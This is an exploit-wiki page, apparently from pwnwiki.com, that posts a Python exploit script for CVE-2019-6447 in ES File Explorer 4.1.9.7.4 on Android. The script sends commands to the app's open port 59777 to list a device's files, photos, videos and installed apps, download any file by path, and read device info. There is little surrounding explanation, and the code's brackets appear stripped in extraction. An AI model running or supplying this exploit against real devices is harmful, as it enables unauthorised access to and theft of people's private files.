pwnwiki.com
,
影响版本
Version: ES File Explorer v4.1.9.7.4
EXP
# Exploit Title: ES File Explorer 4.1.9.7.4 - Arbitrary File Read # Date: 29/06/2021 # Exploit Author: Nehal Zaman # Version: ES File Explorer v4.1.9.7.4 # Tested on: Android # CVE : CVE-2019-6447 import requests import json import ast import sys if len(sys.argv) < 3: print(f"USAGE {sys.argv0} <command> <IP> file to download") sys.exit(1) url = 'http://' + sys.argv2 + ':59777' cmd = sys.argv1 cmds = 'listFiles','listPics','listVideos','listAudios','listApps','listAppsSystem','listAppsPhone','listAppsSdcard','listAppsAll','getFile','getDeviceInfo' listCmds = cmds:9 if cmd not in cmds: print("- WRONG COMMAND!") print("Available commands : ") print(" listFiles : List all Files.") print(" listPics : List all Pictures.") print(" listVideos : List all videos.") print(" listAudios : List all audios.") print(" listApps : List Applications installed.") print(" listAppsSystem : List System apps.") print(" listAppsPhone : List Communication related apps.") print(" listAppsSdcard : List apps on the SDCard.") print(" listAppsAll : List all Application.") print(" getFile : Download a file.") print(" getDeviceInfo : Get device info.") sys.exit(1) print("\n==================================================================") print("| ES File Explorer Open Port Vulnerability : CVE-2019-6447 |") print("| Coded By : Nehal a.k.a PwnerSec |") print("==================================================================\n") header = {"Content-Type" : "application/json"} proxy = {"http":"http://127.0.0.1:8080", "https":"https://127.0.0.1:8080"} def httpPost(cmd): data = json.dumps({"command":cmd}) response = requests.post(url, headers=header, data=data) return ast.literal_eval(response.text) def parse(text, keys): for dic in text: for key in keys: print(f"{key} : {dickey}") print('') def do_listing(cmd): response = httpPost(cmd) if len(response) == 0: keys = else: keys = list(response0.keys()) parse(response, keys) if cmd in listCmds: do_listing(cmd) elif cmd == cmds9: if len(sys.argv) != 4: print("+ Include file name to download.") sys.exit(1) elif sys.argv30 != '/': print("- You need to provide full path of the file.") sys.exit(1) else: path = sys.argv3 print("+ Downloading file...") response = requests.get(url + path) with open('out.dat','wb') as wf: wf.write(response.content) print("+ Done. Saved as `out.dat`.") elif cmd == cmds10: response = httpPost(cmd) keys = list(response.keys()) for key in keys: print(f"{key} : {responsekey}")
免费、自由、人人可编辑的漏洞库--pwnwiki.com